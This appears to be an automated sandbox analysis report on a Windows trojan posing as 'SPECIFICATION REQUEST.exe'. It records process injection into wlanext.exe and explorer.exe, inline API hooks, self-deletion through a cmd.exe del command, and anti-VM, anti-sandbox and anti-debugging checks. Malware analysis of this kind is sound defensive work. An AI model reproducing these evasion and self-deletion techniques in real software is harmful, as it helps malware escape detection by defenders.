            Source: SPECIFICATION REQUEST.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SPECIFICATION REQUEST.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
            Source: SPECIFICATION REQUEST.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: SPECIFICATION REQUEST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SPECIFICATION REQUEST.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: SPECIFICATION REQUEST.exe, 00000002.00000002.276237746.00000000010E0000.00000040.00000001.sdmp, wlanext.exe, 00000005.00000003.275791125.0000000000C70000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: SPECIFICATION REQUEST.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp
            Source: Binary string: wlanext.pdbGCTL source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 0_2_00F0D4FC push E804D3FEh; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00416852 push es; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00417857 push cs; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_004178B6 push FFFFFF85h; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00407994 push cs; iretd
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041CEB5 push eax; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041CF6C push eax; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041CF02 push eax; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0041CF0B push eax; ret
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0040B736 push ebx; retf
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0115D0D1 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 3_2_06D293E6 pushad ; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0331D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C7857 push cs; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C6852 push es; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005C78B6 push FFFFFF85h; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CD90E push cs; iretd
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005B7994 push cs; iretd
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CDE03 push cs; retf
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CCEB5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CCF6C push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CCF0B push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005CCF02 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_005BB736 push ebx; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.65416675715

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEE
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SPECIFICATION REQUEST.exe PID: 2952, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000005B98E4 second address: 00000000005B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000005B9B5E second address: 00000000005B9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe TID: 2964Thread sleep time: -53196s >= -30000s
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe TID: 1900Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6296Thread sleep count: 58 > 30
            Source: C:\Windows\explorer.exe TID: 6296Thread sleep time: -116000s >= -30000s
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 5976Thread sleep time: -115000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: explorer.exe, 00000003.00000000.257604266.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000002.609573292.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000003.00000000.244322625.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000003.00000000.257707108.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000003.00000000.251927254.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000003.00000000.257707108.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0040ACD0 LdrLoadDll,
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01124120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011869A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011941E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01120050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01120050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01183884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01183884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011490AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011058EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01133B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01133B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011BD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01111B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01111B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01105210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01105210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01105210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01105210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110AA16 mov eax, dword ptr fs:[00000030h]
